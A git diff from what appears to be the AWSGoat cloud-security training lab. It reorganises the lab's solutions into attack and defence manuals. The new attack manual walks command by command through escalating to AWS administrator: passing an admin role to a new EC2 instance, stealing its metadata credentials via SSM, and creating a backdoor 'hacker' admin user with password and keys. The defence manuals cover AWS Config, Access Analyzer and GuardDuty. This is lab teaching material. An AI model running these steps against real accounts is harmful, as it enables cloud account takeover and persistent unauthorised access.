diff --git a/README.md b/README.md index 4c19c4b6..e64e91a2 100644 --- a/README.md +++ b/README.md @@ -162,7 +162,7 @@ Litesh Ghute, Software Engineer (Cloud) Intern, INE # Solutions -The manuals are available in the [solutions](solutions/) directory +The offensive manuals are available in the [attack-manuals](attack-manuals/) directory, and the defensive manuals are available in the [defense-manuals](defense-manuals/) directory. Module 1 Exploitation Videos: diff --git a/solutions/module-1/01-Reflected XSS.md b/attack-manuals/module-1/01-Reflected XSS.md similarity index 100% rename from solutions/module-1/01-Reflected XSS.md rename to attack-manuals/module-1/01-Reflected XSS.md diff --git a/solutions/module-1/02-SQL Injection.md b/attack-manuals/module-1/02-SQL Injection.md similarity index 100% rename from solutions/module-1/02-SQL Injection.md rename to attack-manuals/module-1/02-SQL Injection.md diff --git a/solutions/module-1/03-Insecure Direct Object Reference.md b/attack-manuals/module-1/03-Insecure Direct Object Reference.md similarity index 100% rename from solutions/module-1/03-Insecure Direct Object Reference.md rename to attack-manuals/module-1/03-Insecure Direct Object Reference.md diff --git a/solutions/module-1/04-Sensitive Data Exposure.md b/attack-manuals/module-1/04-Sensitive Data Exposure.md similarity index 100% rename from solutions/module-1/04-Sensitive Data Exposure.md rename to attack-manuals/module-1/04-Sensitive Data Exposure.md diff --git a/solutions/module-1/05-Server Side Request Forgery Part 1.md b/attack-manuals/module-1/05-Server Side Request Forgery Part 1.md similarity index 100% rename from solutions/module-1/05-Server Side Request Forgery Part 1.md rename to attack-manuals/module-1/05-Server Side Request Forgery Part 1.md 
diff --git a/solutions/module-1/06-Server Side Request Forgery Part 2.md b/attack-manuals/module-1/06-Server Side Request Forgery Part 2.md similarity index 100% rename from solutions/module-1/06-Server Side Request Forgery Part 2.md rename to attack-manuals/module-1/06-Server Side Request Forgery Part 2.md diff --git a/solutions/module-1/07-IAM Privilege Escalation.md b/attack-manuals/module-1/07-IAM Privilege Escalation.md similarity index 100% rename from solutions/module-1/07-IAM Privilege Escalation.md rename to attack-manuals/module-1/07-IAM Privilege Escalation.md diff --git a/solutions/module-2/01-SQL Injection.md b/attack-manuals/module-2/01-SQL Injection.md similarity index 100% rename from solutions/module-2/01-SQL Injection.md rename to attack-manuals/module-2/01-SQL Injection.md diff --git a/solutions/module-2/02-File Upload and Task Metadata.md b/attack-manuals/module-2/02-File Upload and Task Metadata.md similarity index 100% rename from solutions/module-2/02-File Upload and Task Metadata.md rename to attack-manuals/module-2/02-File Upload and Task Metadata.md diff --git a/solutions/module-2/03-ECS Breakout and Instance Metadata.md b/attack-manuals/module-2/03-ECS Breakout and Instance Metadata.md similarity index 100% rename from solutions/module-2/03-ECS Breakout and Instance Metadata.md rename to attack-manuals/module-2/03-ECS Breakout and Instance Metadata.md diff --git a/attack-manuals/module-2/04-IAM Privilege Escalation.md b/attack-manuals/module-2/04-IAM Privilege Escalation.md new file mode 100644 index 00000000..3368de43 --- /dev/null +++ b/attack-manuals/module-2/04-IAM Privilege Escalation.md 
@@ -0,0 +1,204 @@ +# Objective + +Escalate Privileges to become an administrator on the AWS Account. + +# Solution + +* We have already obtained the ECS host instance's IAM Credentials in the previous manual. + +* Now let's try to create a user using those credentials. + +## Creating a User + +* Let's check the policies attached to our assumed **ecs-instance-role** + +```console +aws iam list-attached-role-policies --role-name ecs-instance-role +``` + +![](./images/04/01.png) + +* As we can see, this role has **IAMFullAccess**. So we should be able to create a user and grant him administrator access. Let's try to create a user named **hacker**. + +```console +aws iam create-user --user-name hacker +``` + +![](./images/04/02.png) + +* Error! we have been denied permission even though we have the **IAMFullAccess** policy. Let's get the role details + +```console +aws iam get-role --role-name ecs-instance-role +``` + +![](./images/04/03.png) + +* There is a permissions boundary associated with the role, we can try to view it. + +```console +aws iam get-policy --policy-arn arn:aws:iam::676162304320:policy/aws-goat-instance-boundary-policy +``` + +![](./images/04/04.png) + +```console +aws iam get-policy-version --policy-arn arn:aws:iam::676162304320:policy/aws-goat-instance-boundary-policy --version-id v1 +``` + +![](./images/04/05.png) + +* Here, we can observe that we have IAM List and Get access along with **iam:PassRole**, **ssm**, **ec2:RunInstance**. + +* From all the information we have, we can try to run a new instance and pass a role that has our desired permissions and create a new user using the creds obtained from the new instance. + +## Finding a role with desired permissions + +* First, we need to list roles to check for our desired permissions. + +```console +aws iam list-roles +``` + +![](./images/04/06.png) + +* We can observe that there is an **ec2Deployer-role**. Let's get the policies attached to it. 
+ +```console +aws iam list-attached-role-policies --role-name ec2Deployer-role +``` + +![](./images/04/07.png) + +* Now, let's get the policy's version. + +```console +aws iam get-policy-version --policy-arn arn:aws:iam::676162304320:policy/ec2DeployerAdmin-policy --version-id v1 +``` + +![](./images/04/08.png) + +* Voila! we have a policy that allows us to perform all actions on all resources, now we need an instance profile with the **ec2Deployer-role** role attached to it! + +* List the instance profiles + +```console +aws iam list-instance-profiles +``` + +![](./images/04/09.png) + +* Make note of the ```InstanceProfileName``` (ec2Deployer) associated with our desired ```RoleName``` (ec2Deployer-role) + +* Now, let's try to pass this role to a new instance. + +## Running new instance + +* For running a new instance we need an **AMI, a security group, a subnet, and an instance profile**. + +* First, let's find an Amazon Linux 2 AMI. The below command lists the latest AMI. + +```console +aws ec2 describe-images --owners amazon --filters 'Name=name,Values=amzn-ami-hvm-*-x86_64-gp2' 'Name=state,Values=available' --query 'reverse(sort_by(Images,&CreationDate))[:1].{id:ImageId,date:CreationDate}' +``` + +![](./images/04/10.png) + +* Make note of the AMI ID, here we get ```ami-01a73f51321ab6899``` as our Amazon Linux 2 AMI. + +* Now, let's check for the available subnets + +```console +aws ec2 describe-subnets +``` + +![](./images/04/11.png) + +* Let's take ```subnet-04b5603ee98706543``` as the subnet id + +* Now, check for security groups + +```console +$ aws ec2 describe-security-groups +``` + +![](./images/04/12.png) + +* Let's take ```sg-001cef4a9d95ebde0``` as the sg id. + +* You'll have to make sure both the security group and the subnet are a part of the same VPC, thus having the same ```VpcId``` in their listings. + +* We have everything now to run a new instance. Let's run a new instance and pass the ```ec2Deployer-role``` to it. 
+ +```console +aws ec2 run-instances --subnet-id subnet-04b5603ee98706543 --image-id ami-01a73f51321ab6899 --iam-instance-profile Name=ec2Deployer --instance-type t2.micro --security-group-ids "sg-001cef4a9d95ebde0" +``` + +![](./images/04/13.png) + +* Voila! we have created a new instance! make note of the ```InstanceID```. In our case, it is ```i-05815ea234a226115``` + +* Now, Let's create a user by obtaining credentials of the passed role with the help of ```ssm``` + +## Obtaining Credentials + +* Run the below command to obtain temporary access credentials for ```ec2Deployer-role``` + +```console +aws ssm send-command --document-name "AWS-RunShellScript" --parameters 'commands=["curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2Deployer-role/"]' --targets "Key=instanceids,Values=i-05815ea234a226115" --comment "aws cli 1" +``` + +![](./images/04/14.png) + +* Make note of the ```CommandId``` to check the commands execution result. + +* Now let's get the creds from the result. + +```console +aws ssm get-command-invocation --command-id "3c827d63-7a7a-4eeb-bf5f-337cc42b3479" --instance-id "i-05815ea234a226115" +``` + +![](./images/04/15.png) + +* We now have the credentials of ```ec2Deployer-role```. Let's export them and create a user. + +## Creating the user + +* First, export the credentials and with these credentials, we can use the role passed to our newly launched instance. + +```console +export AWS_ACCESS_KEY_ID= +export AWS_SECRET_ACCESS_KEY= +export AWS_SESSION_TOKEN= +aws sts get-caller-identity +``` + +![](./images/04/16.png) + +* Now, let's try to create a user. + +```console +aws iam create-user --user-name hacker +``` + +![](./images/04/17.png) + +* We'll now attach AdministratorAccess Policy, and create a login profile for our hacker user. 
+ +```console +aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --user-name hacker +aws iam create-login-profile --user-name hacker --password hackerPassword@123 +aws iam create-access-key --user-name hacker +``` + +![](./images/04/18.png) + +* We have successfully created a user with **AdministratorAccess** on the **AWS Account!** + +# What's Happening? + +* After finding out the resources and actions we have access to, we were able to run an instance and utilize **ec2:passRole** to pass a role that has the desired permissions. + +* With the help of **ssm**, we executed a command on the new instance to obtain the temporary access credentials of the role we passed it. + +* Since that role has our desired permissions, we were able to use its credentials to create a new user on the **AWS Account** with Administrator Access and elevate our privileges. \ No newline at end of file diff --git a/solutions/module-2/images/01/01.png b/attack-manuals/module-2/images/01/01.png similarity index 100% rename from solutions/module-2/images/01/01.png rename to attack-manuals/module-2/images/01/01.png diff --git a/solutions/module-2/images/01/02.png b/attack-manuals/module-2/images/01/02.png similarity index 100% rename from solutions/module-2/images/01/02.png rename to attack-manuals/module-2/images/01/02.png diff --git a/solutions/module-2/images/01/03.png b/attack-manuals/module-2/images/01/03.png similarity index 100% rename from solutions/module-2/images/01/03.png rename to attack-manuals/module-2/images/01/03.png diff --git a/solutions/module-2/images/01/04.png b/attack-manuals/module-2/images/01/04.png similarity index 100% rename from solutions/module-2/images/01/04.png rename to attack-manuals/module-2/images/01/04.png diff --git a/solutions/module-2/images/01/05.png b/attack-manuals/module-2/images/01/05.png similarity index 100% rename from solutions/module-2/images/01/05.png rename to attack-manuals/module-2/images/01/05.png 
diff --git a/solutions/module-2/images/01/06.png b/attack-manuals/module-2/images/01/06.png similarity index 100% rename from solutions/module-2/images/01/06.png rename to attack-manuals/module-2/images/01/06.png diff --git a/solutions/module-2/images/01/07.png b/attack-manuals/module-2/images/01/07.png similarity index 100% rename from solutions/module-2/images/01/07.png rename to attack-manuals/module-2/images/01/07.png diff --git a/solutions/module-2/images/01/08.png b/attack-manuals/module-2/images/01/08.png similarity index 100% rename from solutions/module-2/images/01/08.png rename to attack-manuals/module-2/images/01/08.png diff --git a/solutions/module-2/images/01/09.png b/attack-manuals/module-2/images/01/09.png similarity index 100% rename from solutions/module-2/images/01/09.png rename to attack-manuals/module-2/images/01/09.png diff --git a/solutions/module-2/images/01/10.png b/attack-manuals/module-2/images/01/10.png similarity index 100% rename from solutions/module-2/images/01/10.png rename to attack-manuals/module-2/images/01/10.png diff --git a/solutions/module-2/images/01/11.png b/attack-manuals/module-2/images/01/11.png similarity index 100% rename from solutions/module-2/images/01/11.png rename to attack-manuals/module-2/images/01/11.png diff --git a/solutions/module-2/images/01/12.png b/attack-manuals/module-2/images/01/12.png similarity index 100% rename from solutions/module-2/images/01/12.png rename to attack-manuals/module-2/images/01/12.png diff --git a/solutions/module-2/images/01/13.png b/attack-manuals/module-2/images/01/13.png similarity index 100% rename from solutions/module-2/images/01/13.png rename to attack-manuals/module-2/images/01/13.png diff --git a/solutions/module-2/images/01/14.png b/attack-manuals/module-2/images/01/14.png similarity index 100% rename from solutions/module-2/images/01/14.png rename to attack-manuals/module-2/images/01/14.png 
diff --git a/solutions/module-2/images/01/15.png b/attack-manuals/module-2/images/01/15.png similarity index 100% rename from solutions/module-2/images/01/15.png rename to attack-manuals/module-2/images/01/15.png diff --git a/solutions/module-2/images/01/16.png b/attack-manuals/module-2/images/01/16.png similarity index 100% rename from solutions/module-2/images/01/16.png rename to attack-manuals/module-2/images/01/16.png diff --git a/solutions/module-2/images/01/17.png b/attack-manuals/module-2/images/01/17.png similarity index 100% rename from solutions/module-2/images/01/17.png rename to attack-manuals/module-2/images/01/17.png diff --git a/solutions/module-2/images/01/18.png b/attack-manuals/module-2/images/01/18.png similarity index 100% rename from solutions/module-2/images/01/18.png rename to attack-manuals/module-2/images/01/18.png diff --git a/solutions/module-2/images/02/01.png b/attack-manuals/module-2/images/02/01.png similarity index 100% rename from solutions/module-2/images/02/01.png rename to attack-manuals/module-2/images/02/01.png diff --git a/solutions/module-2/images/02/02.png b/attack-manuals/module-2/images/02/02.png similarity index 100% rename from solutions/module-2/images/02/02.png rename to attack-manuals/module-2/images/02/02.png diff --git a/solutions/module-2/images/02/03.png b/attack-manuals/module-2/images/02/03.png similarity index 100% rename from solutions/module-2/images/02/03.png rename to attack-manuals/module-2/images/02/03.png diff --git a/solutions/module-2/images/02/04.png b/attack-manuals/module-2/images/02/04.png similarity index 100% rename from solutions/module-2/images/02/04.png rename to attack-manuals/module-2/images/02/04.png diff --git a/solutions/module-2/images/02/05.png b/attack-manuals/module-2/images/02/05.png similarity index 100% rename from solutions/module-2/images/02/05.png rename to attack-manuals/module-2/images/02/05.png 
diff --git a/solutions/module-2/images/02/06.png b/attack-manuals/module-2/images/02/06.png similarity index 100% rename from solutions/module-2/images/02/06.png rename to attack-manuals/module-2/images/02/06.png diff --git a/solutions/module-2/images/02/07.png b/attack-manuals/module-2/images/02/07.png similarity index 100% rename from solutions/module-2/images/02/07.png rename to attack-manuals/module-2/images/02/07.png diff --git a/solutions/module-2/images/02/08.png b/attack-manuals/module-2/images/02/08.png similarity index 100% rename from solutions/module-2/images/02/08.png rename to attack-manuals/module-2/images/02/08.png diff --git a/solutions/module-2/images/02/09.png b/attack-manuals/module-2/images/02/09.png similarity index 100% rename from solutions/module-2/images/02/09.png rename to attack-manuals/module-2/images/02/09.png diff --git a/solutions/module-2/images/02/10.png b/attack-manuals/module-2/images/02/10.png similarity index 100% rename from solutions/module-2/images/02/10.png rename to attack-manuals/module-2/images/02/10.png diff --git a/solutions/module-2/images/02/11.png b/attack-manuals/module-2/images/02/11.png similarity index 100% rename from solutions/module-2/images/02/11.png rename to attack-manuals/module-2/images/02/11.png diff --git a/solutions/module-2/images/02/12.png b/attack-manuals/module-2/images/02/12.png similarity index 100% rename from solutions/module-2/images/02/12.png rename to attack-manuals/module-2/images/02/12.png diff --git a/solutions/module-2/images/02/13.png b/attack-manuals/module-2/images/02/13.png similarity index 100% rename from solutions/module-2/images/02/13.png rename to attack-manuals/module-2/images/02/13.png diff --git a/solutions/module-2/images/02/14.png b/attack-manuals/module-2/images/02/14.png similarity index 100% rename from solutions/module-2/images/02/14.png rename to attack-manuals/module-2/images/02/14.png 
diff --git a/solutions/module-2/images/02/15.png b/attack-manuals/module-2/images/02/15.png similarity index 100% rename from solutions/module-2/images/02/15.png rename to attack-manuals/module-2/images/02/15.png diff --git a/solutions/module-2/images/02/16.png b/attack-manuals/module-2/images/02/16.png similarity index 100% rename from solutions/module-2/images/02/16.png rename to attack-manuals/module-2/images/02/16.png diff --git a/solutions/module-2/images/03/01.png b/attack-manuals/module-2/images/03/01.png similarity index 100% rename from solutions/module-2/images/03/01.png rename to attack-manuals/module-2/images/03/01.png diff --git a/solutions/module-2/images/03/02.png b/attack-manuals/module-2/images/03/02.png similarity index 100% rename from solutions/module-2/images/03/02.png rename to attack-manuals/module-2/images/03/02.png diff --git a/solutions/module-2/images/03/03.png b/attack-manuals/module-2/images/03/03.png similarity index 100% rename from solutions/module-2/images/03/03.png rename to attack-manuals/module-2/images/03/03.png diff --git a/solutions/module-2/images/03/04.png b/attack-manuals/module-2/images/03/04.png similarity index 100% rename from solutions/module-2/images/03/04.png rename to attack-manuals/module-2/images/03/04.png diff --git a/solutions/module-2/images/03/05.png b/attack-manuals/module-2/images/03/05.png similarity index 100% rename from solutions/module-2/images/03/05.png rename to attack-manuals/module-2/images/03/05.png diff --git a/solutions/module-2/images/03/06.png b/attack-manuals/module-2/images/03/06.png similarity index 100% rename from solutions/module-2/images/03/06.png rename to attack-manuals/module-2/images/03/06.png diff --git a/solutions/module-2/images/03/07.png b/attack-manuals/module-2/images/03/07.png similarity index 100% rename from solutions/module-2/images/03/07.png rename to attack-manuals/module-2/images/03/07.png 
diff --git a/solutions/module-2/images/03/08.png b/attack-manuals/module-2/images/03/08.png similarity index 100% rename from solutions/module-2/images/03/08.png rename to attack-manuals/module-2/images/03/08.png diff --git a/solutions/module-2/images/03/09.png b/attack-manuals/module-2/images/03/09.png similarity index 100% rename from solutions/module-2/images/03/09.png rename to attack-manuals/module-2/images/03/09.png diff --git a/solutions/module-2/images/03/10.png b/attack-manuals/module-2/images/03/10.png similarity index 100% rename from solutions/module-2/images/03/10.png rename to attack-manuals/module-2/images/03/10.png diff --git a/solutions/module-2/images/03/11.png b/attack-manuals/module-2/images/03/11.png similarity index 100% rename from solutions/module-2/images/03/11.png rename to attack-manuals/module-2/images/03/11.png diff --git a/solutions/module-2/images/03/12.png b/attack-manuals/module-2/images/03/12.png similarity index 100% rename from solutions/module-2/images/03/12.png rename to attack-manuals/module-2/images/03/12.png diff --git a/solutions/module-2/images/03/13.png b/attack-manuals/module-2/images/03/13.png similarity index 100% rename from solutions/module-2/images/03/13.png rename to attack-manuals/module-2/images/03/13.png diff --git a/solutions/module-2/images/03/14.png b/attack-manuals/module-2/images/03/14.png similarity index 100% rename from solutions/module-2/images/03/14.png rename to attack-manuals/module-2/images/03/14.png diff --git a/solutions/module-2/images/03/15.png b/attack-manuals/module-2/images/03/15.png similarity index 100% rename from solutions/module-2/images/03/15.png rename to attack-manuals/module-2/images/03/15.png diff --git a/solutions/module-2/images/03/16.png b/attack-manuals/module-2/images/03/16.png similarity index 100% rename from solutions/module-2/images/03/16.png rename to attack-manuals/module-2/images/03/16.png 
diff --git a/attack-manuals/module-2/images/04/01.png b/attack-manuals/module-2/images/04/01.png new file mode 100644 index 00000000..d20237a5 Binary files /dev/null and b/attack-manuals/module-2/images/04/01.png differ diff --git a/attack-manuals/module-2/images/04/02.png b/attack-manuals/module-2/images/04/02.png new file mode 100644 index 00000000..4d90603a Binary files /dev/null and b/attack-manuals/module-2/images/04/02.png differ diff --git a/attack-manuals/module-2/images/04/03.png b/attack-manuals/module-2/images/04/03.png new file mode 100644 index 00000000..94c0244a Binary files /dev/null and b/attack-manuals/module-2/images/04/03.png differ diff --git a/attack-manuals/module-2/images/04/04.png b/attack-manuals/module-2/images/04/04.png new file mode 100644 index 00000000..bdd5ab41 Binary files /dev/null and b/attack-manuals/module-2/images/04/04.png differ diff --git a/attack-manuals/module-2/images/04/05.png b/attack-manuals/module-2/images/04/05.png new file mode 100644 index 00000000..242cccf8 Binary files /dev/null and b/attack-manuals/module-2/images/04/05.png differ diff --git a/attack-manuals/module-2/images/04/06.png b/attack-manuals/module-2/images/04/06.png new file mode 100644 index 00000000..2ba372a5 Binary files /dev/null and b/attack-manuals/module-2/images/04/06.png differ diff --git a/attack-manuals/module-2/images/04/07.png b/attack-manuals/module-2/images/04/07.png new file mode 100644 index 00000000..89ee8ece Binary files /dev/null and b/attack-manuals/module-2/images/04/07.png differ diff --git a/attack-manuals/module-2/images/04/08.png b/attack-manuals/module-2/images/04/08.png new file mode 100644 index 00000000..73bcfb4c Binary files /dev/null and b/attack-manuals/module-2/images/04/08.png differ diff --git a/attack-manuals/module-2/images/04/09.png b/attack-manuals/module-2/images/04/09.png new file mode 100644 index 00000000..57fab228 Binary files /dev/null and b/attack-manuals/module-2/images/04/09.png differ 
diff --git a/attack-manuals/module-2/images/04/10.png b/attack-manuals/module-2/images/04/10.png new file mode 100644 index 00000000..c359f45a Binary files /dev/null and b/attack-manuals/module-2/images/04/10.png differ diff --git a/attack-manuals/module-2/images/04/11.png b/attack-manuals/module-2/images/04/11.png new file mode 100644 index 00000000..2fbf855d Binary files /dev/null and b/attack-manuals/module-2/images/04/11.png differ diff --git a/attack-manuals/module-2/images/04/12.png b/attack-manuals/module-2/images/04/12.png new file mode 100644 index 00000000..655d0218 Binary files /dev/null and b/attack-manuals/module-2/images/04/12.png differ diff --git a/attack-manuals/module-2/images/04/13.png b/attack-manuals/module-2/images/04/13.png new file mode 100644 index 00000000..62dda7e1 Binary files /dev/null and b/attack-manuals/module-2/images/04/13.png differ diff --git a/attack-manuals/module-2/images/04/14.png b/attack-manuals/module-2/images/04/14.png new file mode 100644 index 00000000..0614c03c Binary files /dev/null and b/attack-manuals/module-2/images/04/14.png differ diff --git a/attack-manuals/module-2/images/04/15.png b/attack-manuals/module-2/images/04/15.png new file mode 100644 index 00000000..9ce28ab3 Binary files /dev/null and b/attack-manuals/module-2/images/04/15.png differ diff --git a/attack-manuals/module-2/images/04/16.png b/attack-manuals/module-2/images/04/16.png new file mode 100644 index 00000000..e42c1782 Binary files /dev/null and b/attack-manuals/module-2/images/04/16.png differ diff --git a/attack-manuals/module-2/images/04/17.png b/attack-manuals/module-2/images/04/17.png new file mode 100644 index 00000000..6bbd7a14 Binary files /dev/null and b/attack-manuals/module-2/images/04/17.png differ diff --git a/attack-manuals/module-2/images/04/18.png b/attack-manuals/module-2/images/04/18.png new file mode 100644 index 00000000..36f0bc02 Binary files /dev/null and b/attack-manuals/module-2/images/04/18.png differ 
diff --git a/defence-manuals/AWS Config.md b/defence-manuals/AWS Config.md new file mode 100644 index 00000000..0fe5f2e6 --- /dev/null +++ b/defence-manuals/AWS Config.md 
@@ -0,0 +1,135 @@ +# Objective +Detect changes in configuration using AWS Config + +# Solution + +* Log in to [AWS account](https://aws.amazon.com/) where [AWS Goat](https://github.com/ine-labs/AWSGoat) infrastructure has been deployed + +* Now, search for **Config** and head to it's page. + + ![](./images/AWS-Config/1.png) + +* Click on **Get Started** + + ![](./images/AWS-Config/2.png) + +## Creating Config Rule + +* In the next page, select the options as shown below + + ![](./images/AWS-Config/3.png) + +* Leave the rest as defualt and click on **Next**. + +* In the **Step 2** page, search for `iam-policy-no-statements-with-admin-access` under **AWS Managed Rules**. + + ![](./images/AWS-Config/4.png) + +* Select that rule and click on **Next**. + +* Leave all options as default in the next page and create the rule. + +* We have successfully created a rule which monitors for policy that has access to all services and all resources. + +* Let's check if this rule is working properly. + +## Testing Config Rule + +* Head to **IAM** > **Policies** > **Create Policy** on the console + + ![](./images/AWS-Config/5.png) + +* Now, in the **Create Policy**, select on **JSON** and paste the below policy. + + ```JSON + { + "Version": "2012-10-17", + "Statement": [ + { + "Effect":"Allow", + "Action":"*", + "Resource":"*" + } + ] + } + ``` + + ![](./images/AWS-Config/6.png) + +* Click on **Next** and name the policy as `FullAccessPolicy`. + + ![](./images/AWS-Config/7.png) + +* Now, head back to **Config** > **Rules**. + + ![](./images/AWS-Config/8.png) + +* We can see that now we have 1 Non-Compliant Resource! click on the rule to view the **Non-Compliant Resourse**. + +* Voila! it is the policy that we had just created. + + ![](./images/AWS-Config/9.png) + +* Now, delete the policy and check if the **Detective Complaince** status has changed. + + ![](./images/AWS-Config/10.png) + + ![](./images/AWS-Config/11.png) + +* The status changed, the rule is working perfectly! 
You can add more rules to monitor the changes in the configuration. + +# Inferences + +* AWS Config tracks and monitors changes in the configuration. + +* We can trigger the evaluations periodically or trigger them when all/specific resource changes. + +* When we created a policy with full access to all resources, AWS Config quickly evaluated the resources based on the trigger and changed the complaince status, this helps us identify if someone is trying to exploit our resources. + +* This can help us detect the attack performed in [IAM Privilege Escalation Manual](https://github.com/ine-labs/AWSGoat/blob/master/attack-manuals/module-1/07-IAM%20Privilege%20Escalation.md). where the hacker tries to create an overly permissive policy. + +# Additional Things To-Do + +* By performing above steps, we can only view the complaince status in AWS Console. We won't be able to check the Config page every now and then to view the complaince status. Therefore, we need an automatic notification system. + +* To do that, we can trigger the config to publish a message into an SNS Topic which in turn sends an email whenever the rule is non-complaint. + +* This is possible by creating a remediation to the rule in AWS Config. + +## Creating Topic + +* First, head over to **Simple Notification Sevice** Page. + + ![](./images/AWS-Config/12.png) + +* Now, create a topic names `Config-Change-Email`. + + ![](./images/AWS-Config/13.png) + +* Now, create a subscription for the topic. Select the **Protocol** as **Email** and enter the preferred email where you want to receive the notification. + + ![](./images/AWS-Config/14.png) + +## Creating Remediation + +* Head back to **Config** > **Rules** and select **Manage Remediation** under **Actions** dropdown for our rule. + + ![](./images/AWS-Config/15.png) + +* In the next page, select the options as shown below. + + ![](./images/AWS-Config/16.png) + +* Type in the Topic arn, Message and AutomationAssumeRole. 
+ + ![](./images/AWS-Config/17.png) + +* We have successfully created a remediation. With this we will now be able to get an email notification whenever there is change in the configuration. + +# Further Readings + +* [What is AWS Config?](https://docs.aws.amazon.com/config/latest/developerguide/WhatIsConfig.html) + +* [IAM Security Best Practices](https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html) + +* [What is Amazon Macie?](https://docs.aws.amazon.com/macie/latest/user/what-is-macie.html) \ No newline at end of file diff --git a/defence-manuals/AWS IAM Access Analyzer.md b/defence-manuals/AWS IAM Access Analyzer.md new file mode 100644 index 00000000..514e6ca2 --- /dev/null +++ b/defence-manuals/AWS IAM Access Analyzer.md 
@@ -0,0 +1,111 @@ +# Objective + +Use AWS IAM Access Analyzer to identify resources shared with an external entity and unintended access to your resources and data, which may pose a security risk. + +# Solution + +Log in to [AWS account](https://aws.amazon.com/) where [AWS Goat](https://github.com/ine-labs/AWSGoat) infrastructure has been deployed. + +Search for "IAM" and navigate to the IAM dashboard. + +![](./images/AWS-IAM-Access-Analyzer/1.png) + +Click on "Access analyzer" from the access reports. + +![](./images/AWS-IAM-Access-Analyzer/2.png) + +Access Analyzer helps you identify the resources in your organization and accounts, such as Amazon S3 buckets or IAM roles, shared with an external entity. This lets you identify unintended access to your resources and data, which is a security risk. + +Now, Click on "Create analyzer". + +![](./images/AWS-IAM-Access-Analyzer/3.png) + +Set everything as default and click on "Create analyzer". + +Access Analyzer generates a finding for each instance of a resource shared outside of your account. The findings include details about the access and the external principal who granted it. When you create an analyzer, you choose an organization or AWS account to analyze. Any principal in the organization or account that you choose for the analyzer is considered trusted. + +![](./images/AWS-IAM-Access-Analyzer/4.png) + +Access Analyzer generates a finding for each instance of a resource-based policy that grants access to a resource within your zone of trust to a principal that is not within your zone of trust. Any sharing that is within the zone of trust is considered safe, so Access Analyzer does not generate a finding. + +Click on "Finding ID" of the resource "S3 Bucket". This will list details about the finding. + +![](./images/AWS-IAM-Access-Analyzer/5.png) + +This finding shows that the resource (S3 Bucket) is open to the public and "Read" and "List" operations can be performed on it. 
+ +Here, Access level "List" is the unintended access to this S3 Bucket and this may lead to the sensitive data exposure. The "s3:ListBucket" permission returns a list of all buckets owned by the authenticated sender of the request and we don't want our user to have this permission. Whereas, "s3:GetObject" permission is simply used to retrieves objects from Amazon S3 bucket. And we need "s3:GetObject" permission to run our web application. + +Click on the resource ARN to navigate to the resource (Open it in a separate tab). + +![](./images/AWS-IAM-Access-Analyzer/6.png) + +Click on "Permissions" + +![](./images/AWS-IAM-Access-Analyzer/7.png) + +Here, click on "Edit" and remove the "s3:ListBucket" action. + +![](./images/AWS-IAM-Access-Analyzer/8.png) + +Remove the "s3:ListBucket". + +![](./images/AWS-IAM-Access-Analyzer/9.png) + +Now, click on the "Save changes". + +![](./images/AWS-IAM-Access-Analyzer/10.png) + +We can see the permission got removed. + +![](./images/AWS-IAM-Access-Analyzer/11.png) + +Click on "Rescan" and you will see the "Status" got changed to "Resolved". + +If the resource is no longer shared outside of your zone of trust, the status of the finding is changed to Resolved. The finding is no longer displayed in the Active findings table, and instead is displayed in the Resolved findings table. Now, the access is removed, the status changed to Resolved. + +![](./images/AWS-IAM-Access-Analyzer/12.png) + +Now, navigate back to the findings dashboard and click on the another finding ID. + +![](./images/AWS-IAM-Access-Analyzer/13.png) + +This finding is due to the bucket being open to the public, as we intended. So, let us "Archive" this finding by clicking on the "Archive" button. + +![](./images/AWS-IAM-Access-Analyzer/14.png) + +Again, navigate back to the findings dashboard and click on the next finding ID. + +![](./images/AWS-IAM-Access-Analyzer/15.png) + +Same as before, this finding is due to the bucket being open to the public, as we intended. 
So, let us "Archive" this finding as well by clicking on the "Archive" button. + +You can click on the resource ARN to view the resource details. + +![](./images/AWS-IAM-Access-Analyzer/16.png) + +Click on the "Archive" button to archive the finding. + +When you archive a finding, it is removed from Active findings and the status changes to Archived. + +![](./images/AWS-IAM-Access-Analyzer/17.png) + +Navigate back to the findings dashboard. Since, we resolved and archived all the findings no more findings are listed here to resolve. + +![](./images/AWS-IAM-Access-Analyzer/18.png) + +# Inferences + +* Access Analyzer identifies the resources, shared with an external entity which may pose security threat. + +* Access Analyzer generates a finding for each instance of a resource shared outside of your account. The findings include details about the access and the external principal who granted it. + +* Using the findings we can take the necessary actions. + +* This can defend us against the attack performed in [IAM Privilege Escalation](https://github.com/ine-labs/AWSGoat/blob/master/attack-manuals/module-1/07-IAM%20Privilege%20Escalation.md) when the attacker tries to list the bucket objects. + +# Further Readings + +* [What is IAM Access Analyzer](https://docs.aws.amazon.com/IAM/latest/UserGuide/what-is-access-analyzer.html) + +* [IAM Security Best Practices](https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html) \ No newline at end of file diff --git a/defence-manuals/Amazon Guarduty.md b/defence-manuals/Amazon Guarduty.md new file mode 100644 index 00000000..5774b192 --- /dev/null +++ b/defence-manuals/Amazon Guarduty.md 
@@ -0,0 +1,101 @@ +# Objective + +Use Amazon GuardDuty findings to analyze S3 data events from your S3 buckets and monitor them for malicious and suspicious activity. + +# Solution + +Log in to [AWS account](https://aws.amazon.com/) where [AWS Goat](https://github.com/ine-labs/AWSGoat) infrastructure has been deployed. + +Search for "GuardDuty" and navigate to the GuardDuty dashboard. + +![](./images/Amazon-Guardduty/1.png) + +Amazon GuardDuty is a threat detection service that continuously monitors your AWS Service accounts, workloads, and data stored in Amazon S3 for malicious activity and provides detailed security findings for visibility and remediation. + +Click on "Get Started". + +![](./images/Amazon-Guardduty/2.png) + +Click on "Enable GuardDuty". + +![](./images/Amazon-Guardduty/3.png) + +A GuardDuty finding denotes a potential security issue discovered in your network. When GuardDuty detects unexpected and potentially malicious activity in your AWS environment, it generates a finding. You can view and manage your GuardDuty findings via the Findings page in the GuardDuty console, as well as through AWS CLI or API operations. + +Since GuardDuty takes time to generate the findings, there may not be any findings available initially. The findings will eventually appear after some time. Keep pressing the refresh button. + +![](./images/Amazon-Guardduty/4.png) + +Once the finding appears, click on the finding to get a detailed view. This will provide the details about the affected resources. + +![](./images/Amazon-Guardduty/5.png) + +Each GuardDuty finding has an assigned severity level and value that reflects the potential risk. GuardDuty breaks down this range into High, Medium, and Low severity levels. This bucket is having "High" severity level. + +![](./images/Amazon-Guardduty/6.png) + +The finding will provide the details about the affected resource. It will also provide the action done. 
